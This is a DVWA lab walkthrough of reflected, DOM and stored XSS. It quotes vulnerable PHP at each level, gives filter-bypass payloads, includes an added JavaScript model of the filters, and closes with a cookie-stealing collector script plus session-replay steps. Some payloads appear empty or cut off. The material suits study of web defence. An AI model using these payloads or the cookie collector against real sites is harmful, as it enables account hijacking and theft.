Reflected type:
In the form, enter Jack
Web page source code: <pre>Hello Jack</pre>
Test:
Low level: <script>alert('XSS')</script>
Code: the input is echoed straight back after the existence check, with no security filtering
<?php
    // Is there any input?
    if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
        // Feedback for end user
        echo '<pre>Hello ' . $_GET[ 'name' ] . '</pre>';
    }
?>
Middle level: <scr<script>ipt>alert('XSS')</script>
Code: <script> is removed with str_replace(), but only once and literally, so a nested tag reassembles after the inner one is stripped and the filter is bypassed
<?php
    // Is there any input?
    if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
        // Get input
        $name = str_replace( '<script>', '', $_GET[ 'name' ] );
        // Feedback for end user
        echo "<pre>Hello ${name}</pre>";
    }
?>
High level: use an event-handler attribute; a test input such as 11</pre><pre>22 shows that tags other than <script> pass through untouched
Code: a regular expression with wildcards strips anything that spells out "script", but event-handler attributes are not filtered at all
<?php
    // Is there any input?
    if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
        // Get input
        $name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] );
        // Feedback for end user
        echo "<pre>Hello ${name}</pre>";
    }
?>
Highest level code: strict; an anti-CSRF token is checked and the input parameter is entity-escaped with htmlspecialchars(), so characters such as < and > are output as HTML entities
<?php
    // Is there any input?
    if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
        // Check Anti-CSRF token
        checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
        // Get input
        $name = htmlspecialchars( $_GET[ 'name' ] );
        // Feedback for end user
        echo "<pre>Hello ${name}</pre>";
    }
    // Generate Anti-CSRF token
    generateSessionToken();
?>
DOM type:
The DOM can be understood as a standard programming interface for accessing HTML.
No server-side involvement is needed; the injection happens entirely in the browser.
Test:
' onclick=alert('XSS')// : closes the single quote, uses the onclick event, and // comments out the trailing single quote
'><' : inserts an image so that its error event fires, then closes the trailing part
Web page source code:
<!DOCTYPE html>
<body>
<script>
function xsstest() {
    var str = document.getElementById("text").value;
    document.getElementById("t").innerHTML = "<a href='" + str + "'>testLink</a>";
}
</script>
<input type="text" id="text" value=""/>
<input type="button" value="Write" onclick="xsstest()">
<div id='t'></div>
</body>
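Added example, not part of the original page: the DOM sink above interpolates the text-box value into a single-quoted href and assigns the string to innerHTML. The builders below reproduce that string and a hardened variant that also restricts href to http(s) URLs (a step the page does not show); buildLinkUnsafe, buildLinkSafe, escapeAttr, isSafeHref and attributeIntact are names chosen here.

```javascript
// Added example (not the page's code): reproduces the vulnerable string
// built by xsstest() and a hardened version. The test input used with it
// is the one quoted on this page for the DOM level.

// Mirror of the vulnerable sink: raw concatenation into a quoted attribute,
// later assigned to innerHTML.
function buildLinkUnsafe(str) {
  return "<a href='" + str + "'>testLink</a>";
}

// Encode the characters that can end or alter an attribute value.
function escapeAttr(str) {
  return String(str)
    .replace(/&/g, "&amp;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;");
}

// Only allow http(s) URLs into href; rejects javascript: and unparsable input.
function isSafeHref(str) {
  try {
    return ["http:", "https:"].includes(new URL(str).protocol);
  } catch (e) {
    return false;
  }
}

// Hardened builder: validate the URL, then encode it for the attribute.
// In a real page prefer document.createElement("a") + setAttribute("href", str)
// and textContent, which avoids HTML string building altogether.
function buildLinkSafe(str) {
  const href = isSafeHref(str) ? escapeAttr(str) : "#";
  return "<a href='" + href + "'>testLink</a>";
}

// Defender's check: a correctly quoted single attribute contains exactly two
// single quotes; any extra means the value broke out of the attribute.
function attributeIntact(html) {
  return (html.match(/'/g) || []).length === 2;
}
```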
Stored type:
Input box length bypass:
<input name="txtName" size="10" maxlength="10" type="text">
The length limit can be modified with Firebug,
or use Burp Suite to capture the request and replay it with a longer value.
Web page source code:
<div id="guestbook_comments">Name: tttt<br />Message: ttttt<br /></div>
Low level:
Test: <script>alert('XSS')</script>
Code:
<?php
    if( isset( $_POST[ 'btnSign' ] ) ) {
        // Get input
        $message = trim( $_POST[ 'mtxMessage' ] ); // trim() removes whitespace (by default) or other given characters from both ends of the string
        $name    = trim( $_POST[ 'txtName' ] );
        // Sanitize message input
        $message = stripslashes( $message ); // remove backslashes
        $message = mysql_real_escape_string( $message ); // escapes characters that are special in SQL, such as ', so it protects the query; the value is later output to the front end without any HTML processing
        // Sanitize name input
        $name = mysql_real_escape_string( $name );
        // Update database
        $query  = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
        $result = mysql_query( $query ) or die( '<pre>' . mysql_error() . '</pre>' );
        mysql_close();
    }
?>
Middle level:
Test: <scr<script>ipt>alert('XSS')</script>
Code:
<?php
    if( isset( $_POST[ 'btnSign' ] ) ) {
        // Get input
        $message = trim( $_POST[ 'mtxMessage' ] );
        $name    = trim( $_POST[ 'txtName' ] );
        // Sanitize message input
        $message = strip_tags( addslashes( $message ) ); // strip_tags() strips HTML tags from the string; addslashes() adds a backslash before quote characters and backslashes
        $message = mysql_real_escape_string( $message );
        $message = htmlspecialchars( $message ); // htmlspecialchars() converts predefined characters such as < > & ' " to HTML entities
        // Sanitize name input
        $name = str_replace( '<script>', '', $name );
        $name = mysql_real_escape_string( $name );
        // Update database
        $query  = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
        $result = mysql_query( $query ) or die( '<pre>' . mysql_error() . '</pre>' );
        mysql_close();
    }
?>
High level:
Test:
Code:
<?php
    if( isset( $_POST[ 'btnSign' ] ) ) {
        // Get input
        $message = trim( $_POST[ 'mtxMessage' ] );
        $name    = trim( $_POST[ 'txtName' ] );
        // Sanitize message input
        $message = strip_tags( addslashes( $message ) );
        $message = mysql_real_escape_string( $message );
        $message = htmlspecialchars( $message );
        // Sanitize name input
        $name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $name );
        $name = mysql_real_escape_string( $name );
        // Update database
        $query  = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
        $result = mysql_query( $query ) or die( '<pre>' . mysql_error() . '</pre>' );
        mysql_close();
    }
?>
Highest level code: very strict
<?php
    if( isset( $_POST[ 'btnSign' ] ) ) {
        // Check Anti-CSRF token
        checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
        // Get input
        $message = trim( $_POST[ 'mtxMessage' ] );
        $name    = trim( $_POST[ 'txtName' ] );
        // Sanitize message input
        $message = stripslashes( $message );
        $message = mysql_real_escape_string( $message );
        $message = htmlspecialchars( $message );
        // Sanitize name input
        $name = stripslashes( $name );
        $name = mysql_real_escape_string( $name );
        $name = htmlspecialchars( $name );
        // Update database
        $data = $db->prepare( 'INSERT INTO guestbook ( comment, name ) VALUES ( :message, :name );' );
        $data->bindParam( ':message', $message, PDO::PARAM_STR );
        $data->bindParam( ':name', $name, PDO::PARAM_STR );
        $data->execute();
    }
    // Generate Anti-CSRF token
    generateSessionToken();
?>
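As an added example (not DVWA's code), the filter stages of the reflected and stored levels above are re-implemented in JavaScript and run over this page's own test inputs, so one can see which stage each input survives and why only entity encoding of the output, together with bound query parameters, holds up. The stage names, the stillHasMarkup check and the surviving helper are chosen here.

```javascript
// Added example (not DVWA's code): JavaScript re-implementations of the filter
// stages used by the PHP levels above, run over this page's own test inputs.
// The inputs used in the checks are constructed from the payloads quoted on the page.

// Mirror of PHP htmlspecialchars() with ENT_QUOTES: encode & < > " '.
function htmlEscape(s) {
  return s.replace(/&/g, "&amp;").replace(/</g, "&lt;").replace(/>/g, "&gt;")
          .replace(/"/g, "&quot;").replace(/'/g, "&#039;");
}

// Simplified mirror of mysql_real_escape_string(): backslash-escape the SQL
// metacharacters only. Tags are untouched, so it protects the query, not the page.
function sqlEscape(s) {
  return s.replace(/[\\'"\x00\n\r\x1a]/g, (c) => "\\" + c);
}

// Medium level: one literal, non-recursive str_replace('<script>', '') pass.
function stripScriptTag(s) {
  return s.split("<script>").join("");
}

// High level: preg_replace('/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '').
// Greedy wildcards mean a single match can swallow most of the string.
function stripScriptRegex(s) {
  return s.replace(/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/gi, "");
}

// Defender's check: does any raw tag opener survive the stage?
function stillHasMarkup(s) {
  return /<[a-z\/!]/i.test(s);
}

// Each level's treatment of the name field; "sqlOnly" is the stored low level,
// which escapes for SQL and then echoes the stored value into HTML unencoded.
const STAGES = {
  low: (s) => s,
  medium: stripScriptTag,
  high: stripScriptRegex,
  sqlOnly: sqlEscape,
  impossible: htmlEscape,   // output encoding; the query itself uses bound parameters
};

// Return the names of the stages that still leave live markup for this input.
function surviving(input) {
  return Object.keys(STAGES).filter((k) => stillHasMarkup(STAGES[k](input)));
}
```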
Stealing cookies:
Attacker code:
<?php
    $cookie    = $_GET[ 'cookie' ];
    $time      = date( 'Y-m-d g:i:s' );
    $referer   = getenv( 'HTTP_REFERER' );
    $cookietxt = fopen( 'cookie.txt', 'a' );
    fwrite( $cookietxt, "Time: " . $time . " Cookie: " . $cookie . " Referer: " . $referer . "\n" ); // watch the double quotes, easy to get wrong
    fclose( $cookietxt );
?>
Script side:
<script>
document.write('');
</script>
After obtaining the cookie, use Firebug to find the current cookie and create a new one with the captured value;
add the cookie, submit the request with the Referer, and you are logged in directly without entering an account or password!
XSS prevention measures:
1. Filter and encode the input on the front end:
for example, only allow characters of the specified type (phone-number format, restrictions on registration user names, and so on); the input check must be completed on the server side, because limits enforced only in the front end are easy to bypass;
filter and escape special characters;
2. Filter and encode the output: encode and escape the value of each variable when it is written into the front-end HTML;
3. Set the HttpOnly flag on key cookies.
XSS summary (continuously updated)